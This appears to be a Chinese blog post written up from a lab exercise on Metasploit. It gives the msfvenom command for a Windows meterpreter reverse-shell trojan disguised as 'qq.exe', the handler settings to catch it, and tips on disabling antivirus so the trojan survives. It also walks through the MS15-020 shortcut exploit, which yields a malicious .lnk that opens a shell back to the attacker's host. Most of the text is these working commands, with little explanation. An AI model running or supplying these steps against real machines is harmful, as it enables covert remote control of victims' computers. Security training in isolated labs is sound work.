MSF-Shellcode生成和MS15-020 渗透利用

1、生成window下后门程序
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.130 LPORT=4444 -f exe > /qq.exe

2、重新打开一个配置窗口
use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set lhost 192.168.200.107
set lport 4444(默认)
exploit

3、找到生成的QQ.exe文件,把他复制到要攻击的主机上
这里要说几个注意事项
1.网络设配器最好都要在NET模式且IP地址为统一网关
2、复制不了的情况是因为没有设置文件共享的路径,两个虚拟机都设置一下
MSF-Shellcode生成和MS15-020 渗透利用_第1张图片
3、把自己电脑的防火墙,各种杀毒软件全关了,不然生成的木马软件会被自动移除

4、在被攻击的主机上打开QQ.exe,在输入shell就可以开始操控了
MSF-Shellcode生成和MS15-020 渗透利用_第2张图片

附:声称其他格式的木马程序的方法
MSF-Shellcode生成和MS15-020 渗透利用_第3张图片
MSF-Shellcode生成和MS15-020 渗透利用_第4张图片

MS15-020 渗透利用

1、
search ms15-020 //搜索漏洞
use exploit/windows/smb/ms15_020_shortcut_icon_dllloader //漏洞模块
info //查看漏洞相关信息
set payload windows/meterpreter/reverse_tcp //设置一个反弹shell
2、
设置好参数(这里老师给的实验文档有点问题)
正确的应该是:
Set Lhost 192.168.86.130 //设置漏洞成功利用后后门连接的地址kali 主机
set lport 4444
3.exploit //执行漏洞
MSF-Shellcode生成和MS15-020 渗透利用_第5张图片
4、在 /root/.msf4/local/msf.lnk中找到这个文件。复制到XP主机上,点击
5、
MSF-Shellcode生成和MS15-020 渗透利用_第6张图片
这样就可以了。

你可能感兴趣的:(MSF-Shellcode生成和MS15-020 渗透利用)